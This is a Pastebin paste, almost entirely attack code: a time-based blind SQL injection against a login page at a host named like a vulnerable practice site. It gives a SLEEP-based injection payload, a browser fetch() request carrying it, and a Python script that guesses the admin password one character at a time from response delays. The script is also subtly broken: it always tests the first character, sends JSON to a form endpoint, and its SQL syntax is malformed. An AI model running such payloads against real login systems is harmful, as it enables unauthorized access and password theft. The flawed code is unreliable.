Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # test' OR IF(substring(password,1,1)='a' SLEEP(10), null)' --
- # fetch("http://reign-vuln-1.azurewebsites.net/check_login.php", {"credentials":"include","headers":{"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","accept-language":"en-US,en;q=0.9","cache-control":"max-age=0","content-type":"application/x-www-form-urlencoded","upgrade-insecure-requests":"1"},"referrer":"http://reign-vuln-1.azurewebsites.net/","referrerPolicy":"no-referrer-when-downgrade","body":"myusername=admin&mypassword=test%27+OR++IF%28substring%28password%2C1%2C1%29%3D%27c%27+SLEEP%2810%29%2C+null%29%27+--&submit_button=Submit","method":"POST","mode":"cors"});
- import requests
- from rich import print
- url = "http://reign-vuln-1.azurewebsites.net/check_login.php"
- CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"
- key = ""
- l_guess = []
- for _ in range (10):
- highest_time = 0
- highest_char = "a"
- key_guesses = {}
- for char in CHARSET:
- body= {"myusername":"admin", "mypassword":f"test' OR IF(substring(password,1,1)='{char}' SLEEP(10), null)' --'"}
- re = requests.post(
- url= url,
- json=body
- )
- ti = re.elapsed.total_seconds()
- if ti > highest_time:
- highest_char = char
- key_guesses[char] = ti
- print (highest_char)
- key += highest_char
- l_guess.append(key_guesses)
- print(l_guess)
- print(key)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement